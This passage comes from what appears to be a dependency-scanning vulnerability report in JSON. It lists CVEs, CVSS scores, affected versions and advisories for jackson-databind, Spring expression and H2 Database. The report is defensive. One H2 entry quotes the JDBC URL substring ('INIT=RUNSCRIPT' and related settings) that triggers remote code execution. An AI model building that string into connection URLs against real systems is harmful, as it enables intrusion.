cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11111/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36186"]}],"cve":"CVE-2020-36186","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-11-19T20:13:06","ids":[{"system_name":"CVE Record","text":"CVE-2020-36186"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization 
gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36186/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36189"]}],"cve":"CVE-2020-36189","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-36189"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 an 2.6.7.5 mishandles the interaction between serialization 
gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36189/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35490"]}],"cve":"CVE-2020-35490","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-35490"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between 
serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35490/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22950"]}],"cve":"CVE-2022-22950","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-04-03T00:01:00","ids":[{"system_name":"CVE Record","text":"CVE-2022-22950"},{"system_name":"Vmware Advisory","text":"cve-2022-22950"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Allocation of Resources Without Limits or Throttling in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Allocation of Resources Without Limits or Throttling in Spring Framework In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service 
condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"Vmware Advisory cve-2022-22950","url":"https://tanzu.vmware.com/security/cve-2022-22950"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22950/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"cve":"CVE-2023-20861","cwe":{"id":"917","name":"Improper Neutralization of Special Elements used in an Expression Language Statement"},"discovery_date":"2023-03-23T21:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-20861"},{"system_name":"NetApp Advisory","text":"ntap-20230420-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service via specially crafted SpEL expression"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service via specially crafted SpEL expression In Spring Framework versions 6.0.0 - 6.0.6, 
5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"NetApp Advisory ntap-20230420-0007","url":"https://security.netapp.com/advisory/ntap-20230420-0007"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20861"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20861/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"cve":"CVE-2023-20863","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-04-13T21:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-20863"},{"system_name":"NetApp Advisory","text":"ntap-20240524-0015"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 
770"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service In Spring Framework versions prior to 5.2.24.release+ , 5.3.27+ and 6.0.8+ , it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"NetApp Advisory ntap-20240524-0015","url":"https://security.netapp.com/advisory/ntap-20240524-0015"},{"summary":"Cve 
2023","url":"https://spring.io/security/cve-2023-20863"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20863/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45868"]}],"cve":"CVE-2022-45868","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T21:30:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-45868"},{"system_name":"GitHub Advisory","text":"GHSA-22wj-vf5f-wrvj"},{"system_name":"Google Advisory","text":"sonatype-2022-6243"}],"notes":[{"audience":"developers","category":"other","text":"Cleartext Storage of Sensitive Information","title":"Additional CWE: 312"},{"category":"description","details":"Vulnerability Description","text":"Password exposure in H2 Database "},{"category":"details","details":"Vulnerability Details","text":"# Password exposure in H2 Database The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. 
Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\""}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"],"known_not_affected":["com.h2database/h2@2.2.220"]},"references":[{"summary":"GitHub Advisory GHSA-22wj-vf5f-wrvj","url":"https://github.com/advisories/GHSA-22wj-vf5f-wrvj"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"Google Advisory sonatype-2022-6243","url":"https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"]}],"title":"CVE-2022-45868/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23221"]}],"cve":"CVE-2022-23221","cwe":{"id":"88","name":"Improper Neutralization of Argument Delimiters in a 
Command"},"discovery_date":"2022-01-21T23:07:39","ids":[{"system_name":"Twitter Advisory","text":"1483824727936450564"},{"system_name":"CVE Record","text":"CVE-2022-23221"},{"system_name":"GitHub Advisory","text":"advisories"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0011"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Arbitrary code execution in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# Arbitrary code execution in H2 Console H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"],"known_not_affected":["com.h2database/h2@2.1.210"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jan/39"},{"summary":"GitHub Advisory advisories","url":"https://github.com/h2database/h2database/security/advisories"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"NetApp Advisory ntap-20230818-0011","url":"https://security.netapp.com/advisory/ntap-20230818-0011"},{"summary":"Twitter Advisory 1483824727936450564","url":"https://twitter.com/d0nkey_man/status/1483824727936450564"},{"summary":"Debian Advisory 
dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"]}],"title":"CVE-2022-23221/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23463"]}],"cve":"CVE-2021-23463","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-12-16T14:29:57","ids":[{"system_name":"CVE Record","text":"CVE-2021-23463"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMH2DATABASE-1769238"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.h2database:h2."},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.h2database:h2. H2 is an embeddable RDBMS written in Java. 
The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability. ## Related CVE(s) CVE-2021-23463, SNYK-JAVA-COMH2DATABASE-1769238"}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"],"known_not_affected":["com.h2database/h2@2.0.202"]},"references":[{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"NetApp Advisory ntap-20230818-0010","url":"https://security.netapp.com/advisory/ntap-20230818-0010"},{"summary":"Snyk Advisory SNYK-JAVA-COMH2DATABASE-1769238","url":"https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"]}],"title":"CVE-2021-23463/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42392"]}],"cve":"CVE-2021-42392","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-01-06T23:55:09","ids":[{"system_name":"CVE Record","text":"CVE-2021-42392"},{"system_name":"GitHub Advisory","text":"GHSA-h376-j262-vhq6"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"Secpod Advisory","text":"log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"},{"system_name":"NetApp Advisory","text":"ntap-20220119-0001"},{"system_name":"JFrog Advisory","text":"the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"RCE in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# RCE in H2 Console ### Impact H2 Console in versions since 1.1.100 (2008-10-14) to 2.0.204 (2021-12-21) inclusive allows loading of custom classes from 
remote servers through JNDI. H2 Console doesn't accept remote connections by default. If remote access was enabled explicitly and some protection method (such as security constraint) wasn't set, an intruder can load own custom class and execute its code in a process with H2 Console (H2 Server process or a web server with H2 Console servlet). It is also possible to load them by creation a linked table in these versions, but it requires `ADMIN` privileges and user with `ADMIN` privileges has full access to the Java process by design. These privileges should never be granted to untrusted users. ### Patches Since version 2.0.206 H2 Console and linked tables explicitly forbid attempts to specify LDAP URLs for JNDI. Only local data sources can be used. ### Workarounds H2 Console should never be available to untrusted users. `-webAllowOthers` is a dangerous setting that should be avoided. H2 Console Servlet deployed on a web server can be protected with a security constraint: https://h2database.com/html/tutorial.html#usingH2ConsoleServlet If `webAllowOthers` is specified, you need to uncomment and edit `` and `` as necessary. See documentation of your web server for more details. 
### References This issue was found and privately reported to H2 team by [JFrog Security](https://www.jfrog.com/)'s vulnerability research team with detailed information."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"],"known_not_affected":["com.h2database/h2@2.0.206"]},"references":[{"summary":"GitHub Advisory GHSA-h376-j262-vhq6","url":"https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6"},{"summary":"JFrog Advisory the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console","url":"https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"NetApp Advisory ntap-20220119-0001","url":"https://security.netapp.com/advisory/ntap-20220119-0001"},{"summary":"Debian Advisory dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Secpod Advisory 
